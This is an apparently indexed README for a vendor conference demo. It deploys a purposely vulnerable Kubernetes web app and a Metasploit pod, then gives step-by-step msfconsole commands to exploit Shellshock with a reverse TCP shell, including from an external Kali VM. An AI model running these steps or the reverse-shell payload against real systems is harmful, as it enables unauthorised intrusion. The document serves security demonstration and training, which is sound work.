Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/checkpointsw-community/vulnerable-containers


https://github.com/checkpointsw-community/vulnerable-containers

Last synced: 4 months ago
JSON representation

Awesome Lists containing this project

README 

          
# CPX 2021 demo



* [Requirements](#requirements)

* [Installation](#installation)

* [Demo](#demo)

* [Cleanup](#cleanup)

* [Attacker from external VM](#attacker-from-external-vm)

* [Tips](#tips)



# Requirements



- [Helm3](https://helm.sh/)

- *Highly recommended*:][K9S](https://github.com/derailed/k9s)

- If you want to demo using the hard way: [kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/)



# Installation

> Make sure you are using Helm3 client

```bash

# Install our sushi restaurant web page

helm install -f cpx-sushi/values.yaml --namespace sushi --create-namespace sushi-restaurant cpx-sushi

# Install the attacker client

helm install -f attacker-cpx/values.yaml --namespace attacker --create-namespace attacker-client attacker-cpx

# Ignore the stdout printed by helm

```



# Demo



Run K9S, check the namespace 'vulnerable' and verify there are 2 pods running

there:



- metasploit-client: We will use this as the "attacker machine"

- vuln-app-cpx-helm-vulnerable: We will use this as the "victim machine"



Verify the vulnerable namespace has a LoadBalancer service which is has an

external-IP assigned. Write down this value as we will need it during the

attack phase. This will allow attacking the application even from outside the

K8S cluster.



Start a shell within the metasploit container and execute:

```bash

cd /usr/src/metasploit-framework

./msfconsole -r docker/msfconsole.rc -y $APP_HOME/config/database.yml

# The metasploit framework shall start...

```



Using the metasploit framework we will exploit the apache_mod_cgi_bash_env_exec:

```bash

search shellshock

# Locate the module with the name apache_mod_cgi_bash_env

use exploit/multi/http/apache_mod_cgi_bash_env_exec

# Check available options

show options

# Set RHOST to the external IP of the vuln-app-cpx-helm-vulnerable

set rhost 

# You could also use the internal cluster IP since the metasploit pod has visibility of the vulnerable pod

set rport 80

set targeturi /cgi-bin/menu

# Set the payload

set payload linux/x86/shell/reverse_tcp

# Check if target is vulnerable

check

# Exploit vulnerability

exploit

```



At this point you may get multiple sessions opened in background mode. List

them and use one of them to exploit the reverse tcp shell:

```bash

#List sessions

sessions

# Run interactive shell in session #1

sessions -i 1

# Start running commands

whoami

ls -la

```

#Cleanup

```bash

helm uninstall sushi-restaurant -n sushi

helm uninstall attacker-client -n attacker

```

# Attacker from external VM

In order to setup the attacker machine from an external VM running a

distribution like Kali Linux, you will need to assign a public IP address to

this machine so that it is reachable. Additionally, the port where the the

reverse shell connection will be established needs to be allowed for input

connections (i.e: In AWS the security group of the EC2 instance needs to allow

input connections to port )



How to run the exploit is very similar. First ssh into the Kali Linux machine:

```bash

# Start metasploit console

msfconsole

# Follow the same steps that we already described

# We will need to set a few extra options

set lhost 

set lport 

# set lport 4444

check

exploit

```



# Tips



- Use K9S client to demonstrate interactively how to perform the attack, it

  will save sometime if you need to run kubectl all the time



  

  

  

*Based on original demo created [here:](https://github.com/chkp-ivanmar/cpx-2021-demo)*